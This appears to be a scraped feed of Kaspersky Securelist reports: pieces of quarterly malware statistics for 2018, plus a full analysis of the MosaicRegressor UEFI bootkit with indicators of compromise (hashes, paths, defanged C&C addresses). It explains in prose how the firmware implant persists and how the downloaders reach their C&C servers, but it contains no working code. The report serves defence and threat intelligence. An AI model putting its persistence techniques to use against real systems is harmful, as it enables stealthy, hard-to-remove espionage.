on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.\n\n_Geography of local malware attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "modified": "2018-11-12T10:00:55", "published": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-07T09:55:20", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0802"], "description": "\n\n[ Part II. Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)\n\nUEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine's boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.\n\nOne such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as means to deploy additional malware on the victim computers, one that we haven't come across thus far. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.\n\nThroughout this blog we will elaborate on the following key findings:\n\n * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;\n * The modules were used to drop malware on the victim machines. This malware was part of a wider malicious framework that we dubbed MosaicRegressor;\n * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;\n * Code artefacts in some of the framework's components and overlaps in C&C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor;\n\nThe attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. This technology was developed to specifically detect threats hiding in the ROM BIOS, including UEFI firmware images.\n\n## Current State of the Art\n\nBefore we dive deep into our findings, let us have a quick recap of what UEFI is and how it was leveraged for attacks thus far. In a nutshell, UEFI is a specification that constitutes the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.\n\nThis interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.\n\nConsidering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded. Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer's motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive. \nThis type of attack has occurred in several instances in the past few years. A prominent example is the LowJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent in a number of Sofacy \\ Fancy Bear victim machines. The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.\n\nAnother example is source code of a UEFI bootkit named VectorEDK which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system which will be run when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK's code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) in Github nowadays, we hadn't witnessed actual evidence of it in the wild, before our latest finding.\n\n## Our Discovery\n\nDuring an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values, those were two DXE drivers and two UEFI applications. After further analysis we were able to determine that they were based on the leaked source code of HackingTeam's VectorEDK bootkit, with minor customizations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)\n\n**_Rogue components found within the compromised UEFI firmware_**\n\nThe goal of these added modules is to invoke a chain of events that would result in writing a malicious executable named 'IntelUpdate.exe' to the victim's Startup folder. Thus, when Windows is started the written malware would be invoked as well. Apart from that, the modules would ensure that if the malware file is removed from the disk, it will be rewritten. Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.\n\nFollowing is an outline of the components that we revealed:\n\n * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team's 'rkloader' component and intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at a point when control can be passed to the operating system's bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the 'SmmAccessSub' component.\n * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow conducting file and directory operations on the disk.\n * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named 'fTA' to a hard-coded GUID. The application is based on a component from the original Vector-EDK code base that is named 'ReSetfTA'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)\n\n**_ __Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**\n\n * **SmmAccessSub: **the main bootkit component that serves as a persistent dropper for a user-mode malware. It is executed by the callback registered during the execution of 'SmmInterfaceBase', and takes care of writing a binary embedded within it as a file named 'IntelUpdate.exe' to the startup directory on disk. This allows the binary to execute when Windows is up and running. \nThis is the only proprietary component amongst the ones we inspected, which was mostly written from scratch and makes only slight use of code from a Vector-EDK application named 'fsbg'. It conducts the following actions to drop the intended file to disk:\n\n * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.\n * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.\n * If the handle to the current image is obtained, the module attempts to find the root drive in which Windows is installed by enumerating all drives and checking that the '\\Windows\\System32' directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive will be created at this point and referenced to open any further directories or files in this drive.\n * If the root drive is found in the previous stage, the module looks for a marker file named 'setupinf.log' under the Windows directory and proceeds only if it doesn't exist. In the absence of this file, it is created.\n * If the creation of 'setupinf.log' succeeds, the module goes on to check if the 'Users' directory exists under the same drive.\n * If the 'Users' directory exists, it writes the 'IntelUpdate.exe' file (embedded in the UEFI application's binary) under the 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup' directory in the root drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)\n\n**_Code from 'SmmAccessSub' used to write the embedded 'IntelUpdate.exe' binary to the Windows Startup directory_**\n\nUnfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.\n\nOne option is through physical access to the victim's machine. This could be partially based on Hacking Team's leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.\n\nFurthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as 'persistent installation') was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected. For this reason we can assume that Hacking Team's method of patching the firmware would work in our case as well.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)\n\n**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as 'persistent installation'_**\n\nOf course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don't have any evidence to support it.\n\n## The Bigger Picture: Enter MosaicRegressor Framework\n\nWhile Hacking Team's original bootkit was used to write one of the company's backdoors to disk, known as 'Soldier', 'Scout' or 'Elite', the UEFI implant we investigated deployed a new piece of malware that we haven't seen thus far. We decided to look for similar samples that share strings and implementation traits with the dropped binary. Consequently, the samples that we found suggested that the dropped malware was only one variant derived from a wider framework that we named MosaicRegressor.\n\nMosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payload on victim machines. The fact that the framework consists of multiple modules assists the attackers to conceal the wider framework from analysis, and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.\n\nThe downloader components of MosaicRegressor are composed of common business logic, whereby the implants contact a C&C, download further DLLs from it and then load and invoke specific export functions from them. The execution of the downloaded modules usually results in output that can be in turn issued back to the C&C.\n\nHaving said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&Cs:\n\n * CURL library (HTTP/HTTPS)\n * BITS transfer interface\n * WinHTTP API\n * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages\n\nThe last variant in the list is distinct for its use of e-mail boxes to host the requested payload. The payload intended to run by this implant can also generate an output upon invocation, which can be later forwarded to a 'feedback' mail address, where it will likely be collected by the attackers.\n\nThe mail boxes used for this purpose reside on the 'mail.ru' domain, and are accessed using credentials that are hard-coded in the malware's binary. To fetch the requested file from the target inbox, MailReg enters an infinite loop where it tries to connect to the "pop.mail.ru" server every 20 minutes, and makes use of the first pair of credentials that allow a successful connection. The e-mails used for login (without their passwords) and corresponding feedback mail are specified in the table below:\n\n**Login mail** | **Feedback mail** \n---|--- \nthtgoolnc@mail.ru | thgetmmun@mail.ru \nthbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru \n \nThe downloaders can also be split in two distinct types, the "plain" one just fetching the payload, and the "extended" version that also collects system information:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)\n\n**_Structure of the log file written by BitsRegEx, strings marked in red are the original fields that appear in that file_**\n\nWe were able to obtain only one variant of the subsequent stage, that installs in the autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader. These components are also just intermediate loaders for the next stage DLLs. Ultimately, there is no concrete business logic in the persistent components, as it is provided by the C&C server in a form of DLL files, most of them temporary.\n\nWe have observed one such library, "**load.rem**", that is a basic document stealer, fetching files from the "Recent Documents" directory and archiving them with a password, likely as a preliminary step before exfiltrating the result to the C&C by another component.\n\nThe following figure describes the full flow and connection between the components that we know about. The colored elements are the components that we obtained and gray ones are the ones we didn't:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)\n\n**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**\n\n \n\n## Who were the Targets?\n\nAccording to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.\n\nBased on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or actual presence within it. This common theme can be reinforced through one of the infection vectors used to deliver the malware to some of the victims, which was SFX archives pretending to be documents discussing various subjects related to North Korea. Those were bundled with both an actual document and MosaicRegressor variants, having both executed when the archive is opened. Examples for the lure documents can be seen below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)\n\n_**Examples of lure documents bundled to malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_\n\n \n\n## Who is behind the attack?\n\nWhen analyzing MosaicRegressor's variants, we noticed several interesting artefacts that provided us with clues on the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:\n\n * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the character sequence '0xA3, 0xBA'. This is an invalid sequence for a UTF8 string and the LATIN1 encoding translates these symbols to a pound sign followed by a "masculine ordinal indicator" ("\u00a3\u00ba"). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces possible candidates that give a more meaningful interpretation. Given the context of the string preceding the symbol and line feed symbols following it, the best match is the "FULL-WIDTH COLON" Unicode character translated from either the Chinese or Korean code pages (i.e. CP936 and CP949).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)\n\n_Figure_: The BitsRegEx system information log making use of the character sequence 0xA3, 0xBA, likely used to represent a full-width colon, according to code pages CP936 and CP949.\n\n * Another artefact that we found was a file resource found in CurlReg samples that contained a language identifier set to 2052 ("zh-CN")\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)\n\n**_Chinese language artefact in the resource section of a CurlReg sample_**\n\n * We detected an OLE2 object taken out of a document armed with the CVE-2018-0802 vulnerability, which was produced by the so-called 'Royal Road' / '8.t' document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)\n\n**_Excerpt from the OLE2 object found within a 'Royal Road' weaponized document, delivering the CurlReg variant_**\n\n * A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor's variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the 'Winnti umbrella and linked groups', according to a publicly available [report](<https://401trg.com/burning-umbrella/>). Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\n## Conclusion\n\nThe attacks described in this blog post demonstrate the length an actor can go in order to gain the highest level of persistence on a victim machine. It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target's SPI flash chip, and the high stakes of burning sensitive toolset or assets when doing so.\n\nWith this in mind, we see that UEFI continues to be a point of interest to APT actors, while at large being overlooked by security vendors. The combination of our technology and understanding of the current and past campaigns leveraging infected firmware, helps us monitor and report on future attacks against such targets.\n\nThe full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.\n\n## IoCs\n\nThe followings IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n**UEFI Modules **\n\nF5B320F7E87CC6F9D02E28350BB87DE6 (SmmInterfaceBase) \n0C136186858FD36080A7066657DE81F5 (SmmAccessSub) \n91A473D3711C28C3C563284DFAFE926B (SmmReset) \nDD8D3718197A10097CD72A94ED223238 (Ntfs)\n\n**RAR SFX droppers**\n\n0EFB785C75C3030C438698C77F6E960E \n12B5FED367DB92475B071B6D622E44CD \n3B3BC0A2772641D2FC2E7CBC6DDA33EC \n3B58E122D9E17121416B146DAAB4DB9D \n70DEF87D180616406E010051ED773749 \n7908B9935479081A6E0F681CCEF2FDD9 \nAE66ED2276336668E793B167B6950040 \nB23E1FE87AE049F46180091D643C0201 \nCFB072D1B50425FF162F02846ED263F9\n\n**Decoy documents**\n\n0D386EBBA1CCF1758A19FB0B25451AFE \n233B300A58D5236C355AFD373DABC48B \n449BE89F939F5F909734C0E74A0B9751 \n67CF741E627986E97293A8F38DE492A7 \n6E949601EBDD5D50707C0AF7D3F3C7A5 \n92F6C00DA977110200B5A3359F5E1462 \nA69205984849744C39CFB421D8E97B1F \nD197648A3FB0D8FF6318DB922552E49E\n\n**BitsReg**\n\nB53880397D331C6FE3493A9EF81CD76E \nAFC09DEB7B205EADAE4268F954444984 (64-bit)\n\n**BitsRegEx**\n\nDC14EE862DDA3BCC0D2445FDCB3EE5AE \n88750B4A3C5E80FD82CF0DD534903FC0 \nC63D3C25ABD49EE131004E6401AF856C \nD273CD2B96E78DEF437D9C1E37155E00 \n72C514C0B96E3A31F6F1A85D8F28403C\n\n**CurlReg**\n\n9E182D30B070BB14A8922CFF4837B94D \n61B4E0B1F14D93D7B176981964388291 \n3D2835C35BA789BD86620F98CBFBF08B\n\n**CurlRegEx**\n\n328AD6468F6EDB80B3ABF97AC39A0721 \n7B213A6CE7AB30A62E84D81D455B4DEA\n\n**MailReg**\n\nE2F4914E38BB632E975CFF14C39D8DCD\n\n**WinHTTP Based Downloaders**\n\n08ECD8068617C86D7E3A3E810B106DCE \n1732357D3A0081A87D56EE1AE8B4D205 \n74DB88B890054259D2F16FF22C79144D \n7C3C4C4E7273C10DBBAB628F6B2336D8\n\n**BitsReg Payload (FileA.z)**\n\n89527F932188BD73572E2974F4344D46\n\n**2nd Stage Loaders**\n\n36B51D2C0D8F48A7DC834F4B9E477238 (mapisp.dll) \n1C5377A54CBAA1B86279F63EE226B1DF (cryptui.sep) \n9F13636D5861066835ED5A79819AAC28 (cryptui.sep)\n\n**3rd Stage Payload**\n\nFA0A874926453E452E3B6CED045D2206 (load.rem)\n\n**File paths**\n\n%APPDATA%\\Microsoft\\Credentials\\MSI36C2.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\%Computername%.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\FileA.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileB.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileC.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileD.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileOutA.dat \n%APPDATA%\\Microsoft\\Network\\DFileA.dll \n%APPDATA%\\Microsoft\\Network\\DFileC.dll \n%APPDATA%\\Microsoft\\Network\\DFileD.dll \n%APPDATA%\\Microsoft\\Network\\subst.sep \n%APPDATA%\\Microsoft\\WebA.dll \n%APPDATA%\\Microsoft\\WebB.dll \n%APPDATA%\\Microsoft\\WebC.dll \n%APPDATA%\\Microsoft\\Windows\\LnkClass.dat \n%APPDATA%\\Microsoft\\Windows\\SendTo\\cryptui.sep \n%APPDATA%\\Microsoft\\Windows\\SendTo\\load.dll %APPDATA%\\Microsoft\\Windows\\load.rem \n%APPDATA%\\Microsoft\\Windows\\mapisp.dll \n%APPDATA%\\Microsoft\\exitUI.rs \n%APPDATA%\\Microsoft\\sppsvc.tbl \n%APPDATA%\\Microsoft\\subst.tbl \n%APPDATA%\\newplgs.dll \n%APPDATA%\\rfvtgb.dll \n%APPDATA%\\sdfcvb.dll \n%APPDATA%\\msreg.dll \n%APPDATA\\Microsoft\\dfsadu.dll \n%COMMON_APPDATA%\\Microsoft\\Windows\\user.rem \n%TEMP%\\BeFileA.dll \n%TEMP%\\BeFileC.dll \n%TEMP%\\RepairA.dll \n%TEMP%\\RepairB.dll \n%TEMP%\\RepairC.dll \n%TEMP%\\RepairD.dll \n%TEMP%\\wrtreg_32.dll \n%TEMP%\\wrtreg_64.dll \n%appdata%\\dwhost.exe \n%appdata%\\msreg.exe \n%appdata%\\return.exe \n%appdata%\\winword.exe\n\n**Domains and IPs**\n\n103.195.150[.]106 \n103.229.1[.]26 \n103.243.24[.]171 \n103.243.26[.]211 \n103.30.40[.]116 \n103.30.40[.]39 \n103.39.109[.]239 \n103.39.109[.]252 \n103.39.110[.]193 \n103.56.115[.]69 \n103.82.52[.]18 \n117.18.4[.]6 \n144.48.241[.]167 \n144.48.241[.]32 \n150.129.81[.]21 \n43.252.228[.]179 \n43.252.228[.]252 \n43.252.228[.]75 \n43.252.228[.]84 \n43.252.230[.]180 \nmenjitghyukl.myfirewall[.]org\n\n**Additional Suspected C&Cs**\n\n43.252.230[.]173 \n185.216.117[.]91 \n103.215.82[.]161 \n103.96.72[.]148 \n122.10.82[.]30\n\n**Mutexes**\n\nFindFirstFile Message Bi \nset instance state \nforegrounduu state \nsingle UI \nOffice Module \nprocess attach Module", "modified": "2020-10-05T10:00:45", "published": "2020-10-05T10:00:45", "id": "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "href": "https://securelist.com/mosaicregressor/98849/", "type": "securelist", "title": "MosaicRegressor: Lurking in the Shadows of UEFI", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud 